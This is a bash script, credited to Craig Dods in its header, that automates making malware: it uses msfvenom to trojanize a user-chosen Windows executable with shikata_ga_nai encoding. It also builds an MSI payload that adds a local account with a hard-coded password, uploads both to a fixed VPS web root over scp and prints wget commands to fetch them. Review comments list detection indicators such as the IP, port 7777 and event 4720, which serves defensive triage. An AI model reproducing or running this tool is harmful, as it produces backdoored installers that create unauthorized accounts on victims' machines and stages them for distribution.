auto_malware.sh
#!/bin/bash
#Written by Craig Dods - August 29th, 2016
#
# Interactive sample generator. Prompts for a Windows executable, runs
# msfvenom twice to produce two output files, copies both to a fixed remote
# host with scp, and prints the wget commands for fetching them.
#
# Reviewer notes for anyone triaging output of this script:
#   - Output names carry a random 24-character prefix, so they differ on
#     every run; the fixed substrings "_Encoded_" and "Backdoor_" stay in
#     the names.
#   - The staging address, the scp port (7777) and the account name and
#     password passed to the second msfvenom call are hard-coded below.
#   - No command's exit status is checked, so "Completed" and the wget hints
#     are printed even when msfvenom or scp fails.

# Hard-coded staging host; it is both the scp destination and the host in
# the printed wget commands.
VPS=45.55.219.243
# Two independent 24-character strings drawn from [a-z0-9] via /dev/urandom,
# used only as filename prefixes.
R1=$(cat /dev/urandom | tr -cd 'a-z0-9' | head -c 24)
R2=$(cat /dev/urandom | tr -cd 'a-z0-9' | head -c 24)
echo "Welcome to the automated malware generator, written by Craig Dods"
echo ""
echo "Please specify which clean file you'd like to infect (e.g. putty.exe)"
# Readline-enabled prompt (-e). Without -r, backslashes in the reply are
# interpreted. ORIG_FILE is expanded unquoted everywhere below, so word
# splitting and globbing apply to whatever is typed here.
read -e -p "Enter: " ORIG_FILE
# The parentheses make these array assignments; the later bare $ENCODED and
# $BACKDOOR expand to element 0 only. The backslash before each underscore
# ends the variable name, so $R1 is not parsed as $R1_Encoded_.
ENCODED=($R1\_Encoded\_$ORIG_FILE)
BACKDOOR=(Backdoor\_$ORIG_FILE)
# Replaces the first occurrence of "exe" anywhere in the name with "msi";
# the pattern is not anchored to the file extension.
BACKDOOR=`echo $BACKDOOR | sed 's/exe/msi/'`
BACKDOOR=($R2\_$BACKDOOR)
echo ""
echo "Thank you"
echo ""
echo "Beginning obfuscation with polymorphic encoders and injecting shell scripts"
echo ""
# First msfvenom run: the chosen file is the executable template (-x) with
# its original behaviour kept (-k), the x86/shikata_ga_nai encoder is applied
# for 5 iterations (-i 5) avoiding the byte \x00 (-b), and the result is
# written as an exe to $ENCODED.
# NOTE(review): the encoder is labelled polymorphic by the script's own
# banner, so a file hash taken from one run is presumably not reusable as an
# indicator for another run.
msfvenom -a x86 --platform windows -x $ORIG_FILE -k -e x86/shikata_ga_nai -i 5 -b '\x00' -f exe -o $ENCODED
# Second msfvenom run: windows/adduser payload packaged as an MSI, redirected
# to $BACKDOOR. The account name and password are literals on this line, so
# they are readable in the script and in the process arguments.
# NOTE(review): on a host where such an MSI runs, local account creation is
# normally recorded as Windows Security event 4720; an alert on a new account
# named as below is a direct detection for this sample. Confirm against the
# audit policy in use.
msfvenom -a x86 --platform windows -p windows/adduser USER=BADGUY PASS=Exce11PA123! -f msi > $BACKDOOR
echo ""
echo "Completed"
echo ""
echo "Uploading to the internet..."
echo ""
# Copies both files to /var/www/html on the staging host over SSH port 7777.
# No remote user is given, so scp falls back to the local user name or the
# SSH client configuration.
# NOTE(review): /var/www/html is presumably the web root, which would make
# both files retrievable by anyone who learns the name. Outbound SSH to this
# address on port 7777 is a usable network indicator.
scp -r -P 7777 $ENCODED $BACKDOOR $VPS:/var/www/html
echo ""
echo "You may now retrieve your malware samples via:"
# No scheme is given in these hints; wget treats a bare host/path as http.
echo "wget $VPS/$ENCODED"
echo "wget $VPS/$BACKDOOR"